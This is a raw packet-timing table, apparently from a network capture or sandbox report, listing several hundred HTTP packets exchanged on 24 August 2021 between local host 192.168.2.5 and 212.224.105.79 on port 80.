Aug 24, 2021 08:49:19.951307058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951335907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951366901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951399088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951416969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951419115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951426983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951457977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951484919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951515913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951533079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951539040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951545954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951575041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951605082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951634884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951663971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951694012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951704979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951725960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951725960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951750040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951760054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951795101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951812029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951842070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951845884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951848984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951873064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951906919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951937914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951956034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951958895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951970100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951999903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952028990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952055931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952078104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952080965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952085972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952116966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952148914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952182055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952207088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952209949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952239990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952263117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952267885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952270031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952300072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952328920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952358961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952373028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952375889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952393055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952424049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952452898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952481985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952502012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952506065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952512026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952539921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952567101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952595949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952611923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952615023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952626944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952653885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952678919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952706099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952732086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952733040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952735901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952760935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952788115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952814102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952831030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952833891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952847004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952872038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952897072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952924013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952945948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952948093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.952950954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.952976942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953005075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953030109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953049898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953052998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953059912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953088045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953114033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953140020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953161001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953165054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953166008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953190088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953213930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953241110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953262091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953267097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.953272104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.953700066 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.976846933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976872921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976888895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976905107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976921082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976936102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976955891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976974964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.976975918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.976990938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977008104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977025032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977040052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977057934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977073908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977085114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977087975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977093935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977111101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977125883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977144003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977159023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977166891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977169991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977175951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977191925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977207899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977221012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977224112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977233887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977251053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977267027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977287054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977303982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977319956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977327108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977329969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977336884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977353096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977370024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977386951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977396965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977400064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977404118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977422953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977442026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977458954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977474928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977490902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977502108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977505922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977507114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977524042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977540970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977554083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977570057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977586985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977595091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977597952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977602959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977619886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977638960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977658033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977674007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977680922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977684975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977691889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977709055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977726936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977741957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977744102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977745056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977761984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977782011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977798939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977817059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977833033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977849960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977857113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977859974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977865934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977881908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977900028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977911949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977916002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.977921009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977940083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977956057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977973938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977988958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.977998972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978003025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978007078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978024006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978040934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978065014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978068113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978071928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978072882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978085995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978102922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978121042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978137016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978143930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978147030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978153944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978171110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978187084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978214979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978216887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978249073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978270054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978286982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978303909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978319883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978327990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978331089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978336096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978352070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978368044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978400946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978404045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978442907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978462934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978481054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978497028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978513002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978519917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978523016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978529930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978545904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978560925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978595972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978599072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978627920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978651047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978666067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978682995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978694916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978698015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978699923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978718996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978753090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978768110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978801012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978802919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978807926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978827953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978844881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978866100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978884935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978888035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978890896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.978902102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.978949070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979002953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979006052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979016066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979032993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979048967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979067087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979084969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979099989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979105949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979110956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979144096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979161978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979172945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979186058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979204893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979221106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979226112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979229927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979253054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979271889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979289055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979290962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979304075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979324102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979345083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979362011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979377031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979381084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979382038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979402065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979419947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979434967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979455948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979477882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979481936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979518890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979535103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979553938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979562998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979566097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979585886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979602098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979621887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979639053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979645967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979649067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979655981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979713917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979734898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979753017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979763031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979765892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979775906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979793072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979809046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979830027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979847908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979851961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979855061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979897976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.979952097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.979954958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.980262995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.980266094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.000560999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000600100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000629902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000638008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000660896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000679016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000695944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000718117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000736952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.000745058 CEST	49712	80	192.168.2.5	212.224.105.79
